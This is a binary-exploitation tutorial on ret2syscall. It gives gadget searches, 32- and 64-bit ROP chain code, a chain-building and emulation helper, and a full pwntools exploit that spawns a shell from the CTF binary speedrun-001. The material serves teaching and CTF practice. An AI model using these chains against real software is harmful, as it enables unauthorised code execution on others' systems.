Ret2syscall

## Basic Information

This is similar to Ret2lib, but in this case no library function is called. Instead, everything is set up to invoke the `sys_execve` syscall with arguments that execute `/bin/sh`. The technique is typically used on statically linked binaries, which tend to contain plenty of gadgets and `syscall` instructions (and no shared libc to return into).

To prepare the syscall the following register state is needed (x86-64):

* `rax`: 59, the `sys_execve` syscall number
* `rdi`: pointer to `"/bin/sh"`, the file to execute
* `rsi`: 0, no arguments are passed (`argv = NULL`, which Linux accepts)
* `rdx`: 0, no environment variables are passed (`envp = NULL`)

So basically it's needed to write the string `/bin/sh` somewhere (NUL-terminated, at a writable address that does not move) and then perform the syscall (being aware of the padding needed to reach the saved return address on the stack). For this, we need a gadget to write `/bin/sh` in a known area.

Another interesting syscall to call is `mprotect`, which would allow an attacker to modify the permissions of a page in memory (for example to make a page that holds shellcode executable). This can be combined with ret2shellcode: the chain calls `mprotect` and then returns into the now-executable shellcode.

## Register Gadgets

Let's start by finding how to control those registers:

```bash
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx|rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```

With these addresses it's possible to write the content in the stack and load it into the registers.

## Write string

### Writable memory

First you need to find a writable place in memory. Here `0x6b6000`, the start of the binary's `rw-` data segment, is used; since the binary is not PIE the address is fixed:

```bash
gef> vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```

### Write String in memory

Then you need to find a way to write arbitrary content in this address, i.e. a write-what-where gadget:

```bash
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```

## Automate ROP chain

The following command creates a full `sys_execve` ROP chain given a static binary when there are write-what-where gadgets and syscall instructions:

```bash
ROPgadget --binary vuln --ropchain
```

### 32 bits

```python
'''
Let's write "/bin/sh" to 0x6b6000 using the 32-bit equivalents of the gadgets:

pop edx ; ret
pop eax ; ret
mov dword ptr [eax], edx ; ret
'''
rop = b''
rop += popEdx           # place value into EDX
rop += b"/bin"          # 4 bytes at a time
rop += popEax           # place value into EAX
rop += p32(0x6b6000)    # writable memory
rop += writeGadget      # address of: mov dword ptr [eax], edx ; ret

rop += popEdx
rop += b"//sh"
rop += popEax
rop += p32(0x6b6000 + 4)
rop += writeGadget
# "/bin//sh" is a valid path, but nothing here writes a NUL terminator:
# this relies on the byte at 0x6b6008 already being zero.
```

### 64 bits

```python
'''
Let's write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = b''
rop += popRdx
rop += b"/bin/sh\x00"   # the string "/bin/sh" plus a NUL byte: exactly one qword
rop += popRax
rop += p64(0x6b6000)    # writable memory
rop += writeGadget      # address of: mov qword ptr [rax], rdx ; ret
```
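The following is an added example, not code from the original page or from the speedrun-001 writeup. It builds the same `execve` chain (and the `mprotect` variant mentioned in the Basic Information section) with plain `struct.pack`, generalises the "write the string one word at a time" step so it handles both the 4-byte and 8-byte cases above and always writes the NUL terminator, and replays the finished chain through a tiny emulator of the six gadgets so the register state can be checked before anything is sent. The gadget and page addresses are the speedrun-001 values quoted on this page; the helper names and the emulator are this example's own, and it assumes the `syscall` gadget is followed by `ret` when the chain needs to continue (as the `mprotect` chain does).

```python
# Added example (not code from the original page): build the ret2syscall chain
# described above with struct.pack and replay it through a tiny gadget emulator
# before sending, so register state and the NUL terminator are checked offline.
# Addresses are the speedrun-001 values quoted on this page; helper names are ours.
import struct

POP_RAX  = 0x415664   # pop rax ; ret
POP_RDI  = 0x400686   # pop rdi ; ret
POP_RSI  = 0x4101f3   # pop rsi ; ret
POP_RDX  = 0x4498b5   # pop rdx ; ret
WRITE    = 0x48d251   # mov qword ptr [rax], rdx ; ret
SYSCALL  = 0x40129c   # syscall (assumed `syscall ; ret` where the chain continues)
WRITABLE = 0x6b6000   # start of the rw- segment shown by vmmap
SYS_EXECVE_X64, SYS_MPROTECT_X64, PROT_RWX = 59, 10, 7

def p64(x): return struct.pack('<Q', x)

def chunk_string(s, width):
    """Split s into width-byte chunks, NUL included, last chunk zero-padded.
    Works for 4-byte (32-bit) and 8-byte (64-bit) stores. The page's 32-bit
    snippet relies on the byte after "//sh" being zero; this always writes it."""
    s += b'\x00'
    chunks = [s[i:i + width] for i in range(0, len(s), width)]
    chunks[-1] = chunks[-1].ljust(width, b'\x00')
    return chunks

def write_string(addr, s, pop_ptr=POP_RAX, pop_val=POP_RDX, store=WRITE, pack=p64):
    """Emit write-what-where gadgets storing s at addr one word at a time."""
    width = len(pack(0))
    rop = b''
    for i, chunk in enumerate(chunk_string(s, width)):
        rop += pack(pop_val) + chunk                   # value to store
        rop += pack(pop_ptr) + pack(addr + i * width)  # where to store it
        rop += pack(store)                             # mov [ptr], val ; ret
    return rop

def build_execve_chain(str_addr=WRITABLE):
    """execve("/bin/sh", NULL, NULL): rax=59, rdi=&"/bin/sh", rsi=rdx=0."""
    rop = write_string(str_addr, b'/bin/sh')
    rop += p64(POP_RAX) + p64(SYS_EXECVE_X64)
    rop += p64(POP_RDI) + p64(str_addr)
    rop += p64(POP_RSI) + p64(0)
    rop += p64(POP_RDX) + p64(0)
    rop += p64(SYSCALL)
    return rop

def build_mprotect_chain(page, size, shellcode_addr):
    """mprotect(page, size, RWX) then `ret` into shellcode (ret2shellcode).
    Needs the syscall gadget to be `syscall ; ret`; check the disassembly."""
    rop = p64(POP_RAX) + p64(SYS_MPROTECT_X64)
    rop += p64(POP_RDI) + p64(page)
    rop += p64(POP_RSI) + p64(size)
    rop += p64(POP_RDX) + p64(PROT_RWX)
    rop += p64(SYSCALL) + p64(shellcode_addr)
    return rop

# Just enough semantics for the gadgets above to replay a chain.
SEMANTICS = {
    POP_RAX: ('pop', 'rax'), POP_RDI: ('pop', 'rdi'),
    POP_RSI: ('pop', 'rsi'), POP_RDX: ('pop', 'rdx'),
    WRITE: ('store', 'rax', 'rdx'), SYSCALL: ('syscall',),
}

def emulate(rop):
    """Replay the chain word by word. Returns (regs, mem, next_word) at the
    moment `syscall` runs; next_word is where a following `ret` would go."""
    regs, mem = {'rax': 0, 'rdi': 0, 'rsi': 0, 'rdx': 0}, {}
    words = [struct.unpack('<Q', rop[i:i + 8])[0] for i in range(0, len(rop), 8)]
    pc = 0
    while pc < len(words):
        op = SEMANTICS.get(words[pc])
        if op is None:
            raise ValueError('unknown gadget 0x%x at word %d' % (words[pc], pc))
        if op[0] == 'pop':
            regs[op[1]] = words[pc + 1]
            pc += 2
        elif op[0] == 'store':
            for k, byte in enumerate(p64(regs[op[2]])):
                mem[regs[op[1]] + k] = byte
            pc += 1
        else:
            return regs, mem, (words[pc + 1] if pc + 1 < len(words) else None)
    raise ValueError('chain never reached syscall')

def check_execve(rop):
    """True if the chain ends in execve("/bin/sh", 0, 0) with the NUL written."""
    regs, mem, _ = emulate(rop)
    path, a = b'', regs['rdi']
    while a in mem and mem[a] != 0:
        path += bytes([mem[a]])
        a += 1
    return (regs['rax'] == SYS_EXECVE_X64 and regs['rsi'] == 0
            and regs['rdx'] == 0 and path == b'/bin/sh' and mem.get(a) == 0)

def build_payload(offset=0x408):
    """Padding up to the saved return address (0x408 in speedrun-001) + chain."""
    rop = build_execve_chain()
    if not check_execve(rop):
        raise ValueError('chain does not set up execve correctly')
    return b'0' * offset + rop
```

`build_payload()` returns exactly what the page's exploit sends (`target.sendline(build_payload())` with pwntools). The emulator knows only the six gadgets above and raises on any other word, so a mistyped address fails locally instead of crashing the target; gadgets with side effects (one that also clobbers `rdx`, say) still need to be read in the disassembly, and the 32-bit case additionally needs `int 0x80` with the `eax`/`ebx`/`ecx`/`edx` convention rather than the register list shown here.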

## Missing Gadgets

If you are missing gadgets, for example to write `/bin/sh` in memory, you can use the SROP technique to control all the register values (including RIP and the parameter registers) from the stack:

See SROP - Sigreturn-Oriented Programming.

## Exploit Example

Full exploit for speedrun-001 combining the gadgets found above:

```python
from pwn import *

target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')

# Establish our ROP gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)

# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)

# Our syscall gadget
syscall = p64(0x40129c)

'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = b''
rop += popRdx
rop += b"/bin/sh\x00" # The string "/bin/sh" with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget

'''
Prep the four registers with their arguments, and make the syscall

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0

syscall
'''
rop += popRax
rop += p64(0x3b)

rop += popRdi
rop += p64(0x6b6000)

rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)

rop += syscall

# Add the padding to the saved return address
payload = b"0"*0x408 + rop

# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)

target.interactive()
```

## Other Examples & References

* [https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
  * 64 bits, no PIE, nx, write in some memory a ROP to call `execve` and jump there.
* [https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html)
  * 64 bits, nx, no PIE, write in some memory a ROP to call `execve` and jump there. In order to write to the stack, a function that performs mathematical operations is abused.
* [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
  * 64 bits, no PIE, nx, brute-forced canary, write in some memory a ROP to call `execve` and jump there.
